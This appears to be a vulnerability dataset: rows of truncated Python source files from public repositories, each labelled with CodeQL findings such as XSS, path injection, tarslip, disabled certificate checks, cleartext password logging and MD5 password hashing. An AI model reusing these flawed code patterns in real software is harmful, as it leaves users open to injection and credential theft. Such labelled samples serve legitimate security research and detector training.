] | [
50
] | |
2024-11-18T23:10:12.046133+00:00 | 1,639,106,227,000 | c643d6eb1849e5046a8367d98fa901637e685dab | 3 | {
"blob_id": "c643d6eb1849e5046a8367d98fa901637e685dab",
"branch_name": "refs/heads/master",
"committer_date": 1639106227000,
"content_id": "d873891a1ae2a44dbec5c360c108cd26cd69ea5d",
"detected_licenses": [
"Unlicense"
],
"directory_id": "6a1615de1bc68e619e34802e21c3d25b4fc9e836",
"extension": "py",... | 2.59375 | stackv2 | from typing import Callable, Tuple
import logging
from aiohttp import web
from http_basic_auth import parse_header, BasicAuthException
log = logging.getLogger(__name__)
class BaseStrategy:
def __init__(self, request: web.Request, storage: dict, handler: Callable, header: str):
self.request = request
... | 42 | 28.02 | 92 | 13 | 247 | python | [{"finding_id": "codeql_py/log-injection_dcb465a903fab92b_b753682b", "tool_name": "codeql", "rule_id": "py/log-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "medium", "message": "This log entry depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unkno... | 1 | true | [
"CWE-117"
] | [
"py/log-injection"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This log entry depends on a [user-provided value](1)."
] | [
17
] | [
null
] | [
40
] | [
80
] | |
2024-11-18T23:21:54.839308+00:00 | 1,489,943,983,000 | 5260c3f9da97d438314e4c52063a441c7bdc33a5 | 3 | {
"blob_id": "5260c3f9da97d438314e4c52063a441c7bdc33a5",
"branch_name": "refs/heads/master",
"committer_date": 1489943983000,
"content_id": "149a29e4344f49004f1affc88c9d6a7abb44f96f",
"detected_licenses": [
"ISC"
],
"directory_id": "7bc26f5adfabf5a49f31520c7ab50f6fbbd14c94",
"extension": "py",
"fi... | 2.578125 | stackv2 |
from jinja2 import Template, Environment, FileSystemLoader
import pypandoc, os
class Filter(object):
def __init__(self, page, theme=None):
"""
Make an output filter for a page object.
Parameter
---------
page : badger page
The page which is being output.... | 43 | 28.37 | 125 | 14 | 287 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_68ab48f614045c71_f8bdd432", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
17
] | [
null
] | [
20
] | [
63
] | |
2024-11-18T21:33:35.469488+00:00 | 1,539,521,046,000 | efb57501f5fa974b8eded3bf39e0c6dadb4ab29c | 3 | {
"blob_id": "efb57501f5fa974b8eded3bf39e0c6dadb4ab29c",
"branch_name": "refs/heads/master",
"committer_date": 1539521046000,
"content_id": "a86c5388efaf3d8483238e30e1443db0aabaeeb5",
"detected_licenses": [
"Unlicense"
],
"directory_id": "cb60f8ed61702f23475847b6246d17661f02f8db",
"extension": "py",... | 2.984375 | stackv2 | #!/usr/bin/env python
import sys
flag = 'cysec16-In05'
from bitstring import BitArray
import time
import signal
import pdb
def write(data, endl='\n'):
sys.stdout.write(data + endl)
sys.stdout.flush()
def readline():
return sys.stdin.readline().strip()
def convert_to_bitstream(data):
return BitArr... | 99 | 26.15 | 178 | 12 | 726 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_3be0a142189ae731_59047d71", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
12
] | [
null
] | [
22
] | [
33
] | |
2024-11-18T21:33:38.921379+00:00 | 1,345,773,641,000 | 228933651fa311b8b1c8f65de9f1f722ef6a0a21 | 3 | {
"blob_id": "228933651fa311b8b1c8f65de9f1f722ef6a0a21",
"branch_name": "refs/heads/master",
"committer_date": 1345773641000,
"content_id": "656f7b9dceb187c7f5338de350ca5cafed7a0e19",
"detected_licenses": [
"BSD-2-Clause"
],
"directory_id": "64a27a9d6f0035dfd52914e94a0ce86514b4612b",
"extension": "p... | 2.734375 | stackv2 | #!/usr/bin/env python3
import threading
import select
import logging
import sys
import socket, ssl
class client(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.name="Client"
self.setDaemon(True)
def run(self):
inSecSock = socket.socket(socket.AF... | 49 | 32.49 | 68 | 14 | 386 | python | [{"finding_id": "codeql_py/insecure-default-protocol_86ef95a638c22f92_d36a7b04", "tool_name": "codeql", "rule_id": "py/insecure-default-protocol", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in... | 2 | true | [
"CWE-327",
"CWE-327"
] | [
"py/insecure-default-protocol",
"py/insecure-default-protocol"
] | [
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM"
] | [
"Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in an insecure default being used.",
"Call to deprecated method ssl.wrap_socket does not specify a protocol, which may result in an insecure default being used."
] | [
18,
41
] | [
null,
43
] | [
16,
12
] | [
60,
41
] | |
2024-11-18T23:15:56.549084+00:00 | 1,625,124,168,000 | e1aa6f4d7371ee1c583c50a81c2bb58dab539716 | 3 | {
"blob_id": "e1aa6f4d7371ee1c583c50a81c2bb58dab539716",
"branch_name": "refs/heads/main",
"committer_date": 1625124168000,
"content_id": "d49947b0f26078f6f53424cba686b426d5af442f",
"detected_licenses": [
"MIT"
],
"directory_id": "7651584948deb92eed45f8d372251dc8aa439122",
"extension": "py",
"file... | 3.140625 | stackv2 | import string
with open('DAY 1\password\password@1651-13.txt','r') as f:
password = f.read()
#'7%SgY1^mj~qz'
list_pass = list(password)
alpha_lower = string.ascii_lowercase
alpha_upper = string.ascii_uppercase
numeric= string.digits
punch = string.punctuation
#Creating Blank list & embeding all charaters ge... | 42 | 18.55 | 64 | 13 | 217 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_5b2f70fcc2df28f8_ed7c7e63", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text."
] | [
42
] | [
null
] | [
7
] | [
32
] | |
2024-11-18T22:30:20.235790+00:00 | 1,457,725,772,000 | 70aeda1e6fba943c7ce2b0ccf8ae5978eb15d454 | 2 | {
"blob_id": "70aeda1e6fba943c7ce2b0ccf8ae5978eb15d454",
"branch_name": "refs/heads/master",
"committer_date": 1457725772000,
"content_id": "4ea2efcbd7d40972522a8c09e6f2f790c47c1905",
"detected_licenses": [
"MIT"
],
"directory_id": "4c514345b4759ed4d17f48565ae66dbd7313a0e8",
"extension": "py",
"fi... | 2.421875 | stackv2 | import datetime
import json
import logging
import tba_config
from google.appengine.ext import deferred
from google.appengine.api import urlfetch
from models.sitevar import Sitevar
class FirebasePusher(object):
FIREHOSE_FEED = 'notifications' # all the notifications
EVENT_FEED = 'events/{}/notifications' ... | 82 | 41.35 | 142 | 18 | 759 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_4283661a9ca357c5_38f8981a", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r... | 3 | true | [
"CWE-312",
"CWE-312",
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data",
"py/clear-text-logging-sensitive-data"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This expression logs [sensitive data (secret)](1) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text.",
"This expression logs [sensitive data (secret)](1) as clear text."
] | [
30,
37,
44
] | [
null,
null,
null
] | [
29,
29,
29
] | [
130,
142,
142
] | |
2024-11-18T22:44:33.233570+00:00 | 1,517,555,853,000 | 8560ee4e3294c6fe52dc871778a584cfb25d723e | 2 | {
"blob_id": "8560ee4e3294c6fe52dc871778a584cfb25d723e",
"branch_name": "refs/heads/master",
"committer_date": 1517555853000,
"content_id": "11ad63b93ce628ef9666b8fddb0fb7797994d39c",
"detected_licenses": [
"MIT"
],
"directory_id": "628d63ce8027b6cc95c7b4f085aea69a8a5bbd40",
"extension": "py",
"fi... | 2.359375 | stackv2 | import re
import os
import json
import codecs
import random
import pickle
import utility
import numpy as np
import pandas as pd
import xgboost as xgb
import data_io as dio
from sklearn.svm import SVC
from pypinyin import lazy_pinyin
from utility import stop_words
from utility import homepage_neg
from utility import ho... | 331 | 34.94 | 142 | 20 | 3,135 | python | [{"finding_id": "codeql_py/overly-large-range_4295bda300fc898b_5e270a84", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\].", "remediation... | 4 | true | [
"CWE-020",
"CWE-020",
"CWE-020",
"CWE-020"
] | [
"py/overly-large-range",
"py/overly-large-range",
"py/overly-large-range",
"py/overly-large-range"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"Suspicious character range that is equivalent to \\[.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\].",
"Suspicious character range that is equivalent to \\[.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\].",
"Suspicious character range that is equivalent to \\[.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\].",
"Suspicious character range tha... | [
118,
118,
119,
119
] | [
null,
null,
null,
null
] | [
37,
78,
39,
82
] | [
40,
81,
42,
85
] | |
2024-11-18T22:44:38.391243+00:00 | 1,614,102,420,000 | acffdfca6bbf07e689b0ce46c707ad43f11ecae8 | 3 | {
"blob_id": "acffdfca6bbf07e689b0ce46c707ad43f11ecae8",
"branch_name": "refs/heads/master",
"committer_date": 1614102420000,
"content_id": "b696cf9a46f11572d41bd62d8fbeafed6126f8f0",
"detected_licenses": [
"MIT"
],
"directory_id": "b3e6a859581932e4dffc49a2740b61377d6930d9",
"extension": "py",
"fi... | 2.828125 | stackv2 | import discord
from discord.ext import commands
from wordcloud import WordCloud
import random
import os
import asyncio
from concurrent.futures import ThreadPoolExecutor
import re
async def cloud_making(func, text, font, hues, res):
executor = ThreadPoolExecutor(10)
loop = asyncio.get_event_loop()
await loo... | 151 | 27.33 | 158 | 19 | 1,122 | python | [{"finding_id": "codeql_py/overly-large-range_8d390ef2431f6e17_0056219e", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[*+,\\-.\\/0-9:;<=\\].", "remediation": "", "location... | 1 | true | [
"CWE-020"
] | [
"py/overly-large-range"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Suspicious character range that is equivalent to \\[*+,\\-.\\/0-9:;<=\\]."
] | [
35
] | [
null
] | [
50
] | [
53
] | |
2024-11-18T22:44:49.094640+00:00 | 1,558,953,132,000 | eab4725d90c512c4ba61da8bb434fad401ad4b29 | 4 | {
"blob_id": "eab4725d90c512c4ba61da8bb434fad401ad4b29",
"branch_name": "refs/heads/master",
"committer_date": 1558953132000,
"content_id": "9722d299eb30ecb5456e2d5b5d8beea08565fb6b",
"detected_licenses": [
"MIT"
],
"directory_id": "c2d27841b828321b3307d95ca79964edbaa1a8b6",
"extension": "py",
"fi... | 3.890625 | stackv2 | '''
class MyClass:
variable = "blah"
def function(self): #without self cannot define a function.. it is similar to this in C++
#a=10
print("This is a message inside the class.")
#return a
myobjectx = MyClass() #creating object/instance
print(myobjectx.variable)
print(myobject... | 168 | 26.01 | 114 | 11 | 1,167 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_fe3c12ddbd90c26d_0f8a1c5f", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (private)](1) as clear text.", "... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (private)](1) as clear text."
] | [
163
] | [
null
] | [
7
] | [
8
] | |
2024-11-18T23:36:54.660041+00:00 | 1,353,424,522,000 | 194ef72ed3a3611248a2b0194b4f6a4e8558b8c3 | 2 | {
"blob_id": "194ef72ed3a3611248a2b0194b4f6a4e8558b8c3",
"branch_name": "refs/heads/master",
"committer_date": 1353424522000,
"content_id": "7d929d9e3c67b20c4c864022be39db8f31107398",
"detected_licenses": [
"MIT"
],
"directory_id": "2602451758ac4af60eab63577aed55286276263d",
"extension": "py",
"fi... | 2.421875 | stackv2 | # coding: utf-8
__version__ = "0.2.1.1"
# SublimeServer Settings
settings = None
# HTTP server thread
thread = None
# Open directories
dic = None
# Fail attempts
attempts = 0
# Sublime complete loaded?
loaded = False
import sublime, sublime_plugin
import webbrowser
import os
import posixpath
import BaseHTTPServer
fro... | 424 | 32.58 | 135 | 21 | 3,096 | python | [{"finding_id": "codeql_py/http-response-splitting_f1ceff7afe8ae27e_82027971", "tool_name": "codeql", "rule_id": "py/http-response-splitting", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This HTTP header is constructed from a [user-provided value](1).\nThis HTTP header is con... | 1 | true | [
"CWE-113"
] | [
"py/http-response-splitting"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This HTTP header is constructed from a [user-provided value](1).\nThis HTTP header is constructed from a [user-provided value](2).\nThis HTTP header is constructed from a [user-provided value](3)."
] | [
136
] | [
null
] | [
46
] | [
61
] | |
2024-11-18T23:36:59.412744+00:00 | 1,586,379,987,000 | 32192e7ef1375b5012ea4d19625ca3867a79abb7 | 3 | {
"blob_id": "32192e7ef1375b5012ea4d19625ca3867a79abb7",
"branch_name": "refs/heads/master",
"committer_date": 1586379987000,
"content_id": "958281f99e75a2c555f6179f9b715a50bae932cc",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "9c0bcbb93c78cefec0ebf5cc83358765468608b8",
"extension": "py"... | 2.640625 | stackv2 | # -*- coding: UTF-8 -*-
import os
import sys
import time
import argparse
from getpass import getpass
import requests
from vlab_inf_common.vmware import vCenter, vim
def printerr(message):
"""Like print(), but to stderr
:Returns: None
:param message: **Required** What to print to standard error
:typ... | 192 | 38.96 | 154 | 18 | 1,660 | python | [{"finding_id": "codeql_py/request-without-cert-validation_ee9b9a2df1734231_68a39b44", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1)."
] | [
181
] | [
null
] | [
20
] | [
73
] | |
2024-11-18T21:14:05.379077+00:00 | 1,526,005,494,000 | fdd66715d68fe76e91b13542f5f0f9a3900817ec | 2 | {
"blob_id": "fdd66715d68fe76e91b13542f5f0f9a3900817ec",
"branch_name": "refs/heads/master",
"committer_date": 1526005494000,
"content_id": "5529da499e7567968e81dc2a47e558acacaee112",
"detected_licenses": [
"BSD-3-Clause"
],
"directory_id": "75110fa76091483c9efcb1a77eeba01496043f0a",
"extension": "p... | 2.46875 | stackv2 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, jsonify
from parse import get_591_info
import re
app = Flask(__name__)
app.config["JSON_SORT_KEYS"] = False
app.config["JSON_AS_ASCII"] = True
pattern = re.compile(r'^https://rent.591.com.tw/rent-detail-\d+.html$')
@app.route('/591/<path:url>')
d... | 38 | 19.55 | 71 | 14 | 202 | python | [{"finding_id": "codeql_py/incomplete-hostname-regexp_9003fc46891304ff_8027322b", "tool_name": "codeql", "rule_id": "py/incomplete-hostname-regexp", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This regular expression has an unescaped '.' before '591.com', so it might match more ho... | 1 | true | [
"CWE-020"
] | [
"py/incomplete-hostname-regexp"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This regular expression has an unescaped '.' before '591.com', so it might match more hosts than expected."
] | [
11
] | [
null
] | [
24
] | [
70
] | |
2024-11-18T21:57:33.834172+00:00 | 1,592,139,119,000 | 9d0873af726a25531d0f016ad15a556467956611 | 3 | {
"blob_id": "9d0873af726a25531d0f016ad15a556467956611",
"branch_name": "refs/heads/master",
"committer_date": 1592139119000,
"content_id": "11ba9fdc8f98e6f1907b173c37764e3ba288983b",
"detected_licenses": [
"MIT"
],
"directory_id": "310841013efe61f54347d834d6cecb10f297ec8a",
"extension": "py",
"fi... | 2.71875 | stackv2 | #!/usr/bin/env python
Group = {
"GROUP_NAME": "Spaghetti",
"GROUP_MEMBER_1": "20182022, Yerkebulan Pansat",
"GROUP_MEMBER_2": "20172001, Nurseiit Abdimomyn"
}
import re
import json
import matplotlib.pyplot as plt
def read_file(file_name):
tweets = []
with open(file_name, 'r') as f:
for li... | 174 | 24.67 | 96 | 17 | 1,138 | python | [{"finding_id": "codeql_py/overly-large-range_50ee758263301176_bf28b5bf", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that is equivalent to \\[$%&'()*+,\\-.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\].", ... | 1 | true | [
"CWE-020"
] | [
"py/overly-large-range"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Suspicious character range that is equivalent to \\[$%&'()*+,\\-.\\/0-9:;<=>?@A-Z\\\\[\\\\\\\\]^_\\]."
] | [
145
] | [
null
] | [
47
] | [
50
] | |
2024-11-18T21:57:49.519247+00:00 | 1,607,934,116,000 | ccd7ddd4bbe964d3c886212fa544b7027f208725 | 3 | {
"blob_id": "ccd7ddd4bbe964d3c886212fa544b7027f208725",
"branch_name": "refs/heads/master",
"committer_date": 1607934116000,
"content_id": "9e58ca179a6ebdd36a35064548c7b22e3cbcfb3a",
"detected_licenses": [
"MIT"
],
"directory_id": "ea5c1de05ad3668c4cf36beae800fc33b3b4598b",
"extension": "py",
"fi... | 2.625 | stackv2 | """
docat
~~~~~
Host your docs. Simple. Versioned. Fancy.
:copyright: (c) 2019 by docat, https://github.com/randombenj/docat
:license: MIT, see LICENSE for more details.
"""
import os
from http import HTTPStatus
from pathlib import Path
from flask import Flask, request, send_from_directory
from werkzeug.utils impor... | 72 | 30.33 | 84 | 14 | 526 | python | [{"finding_id": "codeql_py/reflective-xss_e96d278437864822_91d60eac", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).\nCross-site scripting vulnerability d... | 4 | true | [
"CWE-079",
"CWE-079",
"CWE-022",
"CWE-022"
] | [
"py/reflective-xss",
"py/reflective-xss",
"py/path-injection",
"py/path-injection"
] | [
"HIGH",
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1).\nCross-site scripting vulnerability due to a [user-provided value](2).",
"Cross-site scripting vulnerability due to a [user-provided value](1).",
"This path depends on a [user-provided value](1).\nThis path depends on a [user-provided value]... | [
57,
62,
39,
42
] | [
58,
63,
null,
null
] | [
13,
13,
5,
24
] | [
32,
33,
14,
40
] | |
2024-11-18T21:58:07.443696+00:00 | 1,458,682,059,000 | 198b3201f7a48c0ba6233986e1522fcc60cae062 | 3 | {
"blob_id": "198b3201f7a48c0ba6233986e1522fcc60cae062",
"branch_name": "refs/heads/master",
"committer_date": 1458682059000,
"content_id": "6daa33bf7c91f9094e6d3e0f932c2285e41dbccc",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "95e33ab2714ccf0227741d4f6b5d89c61c174a12",
"extension": "py"... | 3.03125 | stackv2 | # RJ Hunter
# AD 440
# Cloud Practicum
#
# file contains method to call twitter api and verify credentials of the
# app user.
#
import requests
from requests_oauthlib import OAuth1
# method calls twitter api and verifys a user's credentials. The method
# will return a HTTP status code (200 for success, 401 for ... | 47 | 37.36 | 85 | 9 | 508 | python | [{"finding_id": "codeql_py/clear-text-logging-sensitive-data_679cedbcb3fa1c4f_bd4c5323", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-logging-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression logs [sensitive data (password)](1) as clear text."
] | [
43
] | [
null
] | [
11
] | [
57
] | |
2024-11-18T21:58:32.879654+00:00 | 1,521,615,921,000 | 7f8beffd80823510e56f4468c4256fa164a4aac9 | 3 | {
"blob_id": "7f8beffd80823510e56f4468c4256fa164a4aac9",
"branch_name": "refs/heads/master",
"committer_date": 1521615921000,
"content_id": "9b069bebadf2c59d211adcc6ff5dc75c338943f6",
"detected_licenses": [
"MIT"
],
"directory_id": "b7e01e214b87221fb77b0aa564a594604624895f",
"extension": "py",
"fi... | 2.859375 | stackv2 | import getpass
import os
from time import sleep
from selenium import webdriver
import six
def get_details():
file = 'password.txt'
# retrive password if saved previously
if os.path.isfile(file):
with open(file, 'r') as f:
usr = f.readline()
pwd = f.readline()
... | 61 | 25.3 | 81 | 16 | 384 | python | [{"finding_id": "codeql_py/clear-text-storage-sensitive-data_79885b6f974145ac_ccc305ea", "tool_name": "codeql", "rule_id": "py/clear-text-storage-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression stores [sensitive data (password)](1) as clear text."... | 1 | true | [
"CWE-312"
] | [
"py/clear-text-storage-sensitive-data"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"This expression stores [sensitive data (password)](1) as clear text."
] | [
35
] | [
null
] | [
25
] | [
28
] | |
2024-11-18T22:05:55.334328+00:00 | 1,445,644,787,000 | aadc8b038be0f2dc80eaf3e194c0d5c31540bfd4 | 2 | {
"blob_id": "aadc8b038be0f2dc80eaf3e194c0d5c31540bfd4",
"branch_name": "refs/heads/master",
"committer_date": 1445644787000,
"content_id": "0f9b76e15493776bcde46ea6c94a3bcb0791e3e0",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "a21399c8a9496198ac44b0e9e4f265102178e90d",
"extension": "py"... | 2.453125 | stackv2 | #!/usr/bin/env python2.7
from hashlib import md5
from Crypto.Cipher import AES
from Crypto import Random
import base64
from boto3 import client
from boto3.session import Session
from optparse import OptionParser
from ConfigParser import ConfigParser
from os import walk, path, mkdir, rmdir, remove
import tarfile
from ... | 168 | 37.26 | 117 | 17 | 1,604 | python | [{"finding_id": "codeql_py/weak-sensitive-data-hashing_c4b4d2df3f5582de_953af107", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insec... | 2 | true | [
"CWE-327",
"CWE-022"
] | [
"py/weak-sensitive-data-hashing",
"py/tarslip"
] | [
"HIGH",
"MEDIUM"
] | [
"MEDIUM",
"MEDIUM"
] | [
"[Sensitive data (password)](1) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function.\n[Sensitive data (password)](2) is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensi... | [
63,
151
] | [
null,
null
] | [
19,
9
] | [
40,
12
] | |
2024-11-18T22:48:23.538792+00:00 | 1,466,446,478,000 | 0ac62a39093c518b2349fefabf064e92886ad987 | 3 | {
"blob_id": "0ac62a39093c518b2349fefabf064e92886ad987",
"branch_name": "refs/heads/master",
"committer_date": 1466446478000,
"content_id": "ef7b3a9fb8a9fc9a1b2560850017532f8336f2bc",
"detected_licenses": [
"MIT"
],
"directory_id": "62d7c6c70500cbd4463b55ec2ad9b58526925b3b",
"extension": "py",
"fi... | 2.609375 | stackv2 | import json
import os
import re
import requests
from models import Torrent
from operator import itemgetter
from provider import BaseProvider
class Eztv(BaseProvider):
def __init__(self, base_url):
super(Eztv, self).__init__(base_url)
self.shows = []
self.shows_cache_path = os.path.join(
... | 152 | 35.84 | 79 | 18 | 1,273 | python | [{"finding_id": "codeql_py/redos_001481e799a89537_891ed1f5", "tool_name": "codeql", "rule_id": "py/redos", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This part of the regular expression may cause exponential backtracking on strings containing many repetitions of 'A'.", "remediati... | 3 | true | [
"CWE-1333",
"CWE-1333",
"CWE-1333"
] | [
"py/redos",
"py/redos",
"py/redos"
] | [
"HIGH",
"HIGH",
"HIGH"
] | [
"MEDIUM",
"MEDIUM",
"MEDIUM"
] | [
"This part of the regular expression may cause exponential backtracking on strings containing many repetitions of 'A'.",
"This part of the regular expression may cause exponential backtracking on strings containing many repetitions of 'A'.",
"This part of the regular expression may cause exponential backtrackin... | [
132,
133,
134
] | [
null,
null,
null
] | [
33,
37,
37
] | [
42,
46,
46
] | |
2024-11-18T23:25:55.788866+00:00 | 1,560,047,606,000 | 8cbd1c385ca710cf2a48c9a858235d52e874ecdb | 2 | {
"blob_id": "8cbd1c385ca710cf2a48c9a858235d52e874ecdb",
"branch_name": "refs/heads/master",
"committer_date": 1560047606000,
"content_id": "0972b7ec1440099978bc29eee56f1186fc1af6c5",
"detected_licenses": [
"BSD-3-Clause"
],
"directory_id": "a722afbe62f9eeaab8c4c587d64603732dd26f3d",
"extension": "p... | 2.46875 | stackv2 | # -*- coding: utf8 -*-
from flask import Flask
from jinja2 import Environment, PackageLoader
from scrawler import settings
from peewee import *
import sys
try:
reload(sys)
sys.setdefaultencoding('utf8')
except Exception:
pass
app = Flask(__name__)
database = MySQLDatabase(
settings.DBNAME,
host=... | 135 | 28.01 | 93 | 13 | 953 | python | [{"finding_id": "codeql_py/jinja2/autoescape-false_2650cedcb75908b0_b316e666", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati... | 1 | true | [
"CWE-079"
] | [
"py/jinja2/autoescape-false"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"Using jinja2 templates with autoescape=False can potentially allow XSS attacks."
] | [
35
] | [
null
] | [
17
] | [
73
] | |
2024-11-18T22:27:25.149805+00:00 | 1,508,771,342,000 | af1f3d2b662a6555362af222636912187bd1698c | 2 | {
"blob_id": "af1f3d2b662a6555362af222636912187bd1698c",
"branch_name": "refs/heads/master",
"committer_date": 1508771342000,
"content_id": "bec9acdb99ab367c4982c6331ffcb84b7d8edaef",
"detected_licenses": [
"Apache-2.0"
],
"directory_id": "786a53e09c6cb40cd359e6c7871e1f1485f5b2eb",
"extension": "py"... | 2.328125 | stackv2 | import logging
import os
import json
import time
import requests
from iemit_plugin import IEmitter
from plugins.emitters.base_http_emitter import BaseHttpEmitter
from utils.crawler_exceptions import EmitterUnsupportedFormat
logger = logging.getLogger('crawlutils')
class SasEmitter(BaseHttpEmitter, IEmitter):
... | 155 | 35.42 | 77 | 18 | 1,138 | python | [{"finding_id": "codeql_py/request-without-cert-validation_53f1868c8cf4cc0f_bed7367f", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]... | 1 | true | [
"CWE-295"
] | [
"py/request-without-cert-validation"
] | [
"MEDIUM"
] | [
"MEDIUM"
] | [
"This request may run without certificate validation because [it is disabled](1) by [this value](2)."
] | [
132
] | [
134
] | [
28
] | [
70
] | |
2024-11-18T22:27:27.948332+00:00 | 1,593,542,060,000 | 6b9fcae2b3eb21edf29a1aceb57793285080506d | 3 | {
"blob_id": "6b9fcae2b3eb21edf29a1aceb57793285080506d",
"branch_name": "refs/heads/master",
"committer_date": 1593542060000,
"content_id": "c2cff77777c54add0f1bdd37b04a645bd54164eb",
"detected_licenses": [
"MIT"
],
"directory_id": "824dd9054d775f7de48840334da14d93f2cada5e",
"extension": "py",
"fi... | 2.75 | stackv2 | import datetime
from flask import Flask, jsonify
from flask_cors import CORS
import numpy as np # np is general convention
# configuration
# instantiate the app
# app:app is a default name that would be autodiscovered by flask run
app = Flask(__name__)
app.config.from_object(__name__)
# enable CORS
CORS(app, resour... | 32 | 24.5 | 73 | 13 | 205 | python | [{"finding_id": "codeql_py/reflective-xss_c00ca49b8e09b267_7dcbed26", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi... | 1 | true | [
"CWE-079"
] | [
"py/reflective-xss"
] | [
"HIGH"
] | [
"MEDIUM"
] | [
"Cross-site scripting vulnerability due to a [user-provided value](1)."
] | [
28
] | [
32
] | [
12
] | [
6
] | |
2024-11-18T22:27:41.359499+00:00 | 1,691,037,619,000 | ddb102fea6a4f1a3ff8074db3e7362217ee35142 | 3 | {
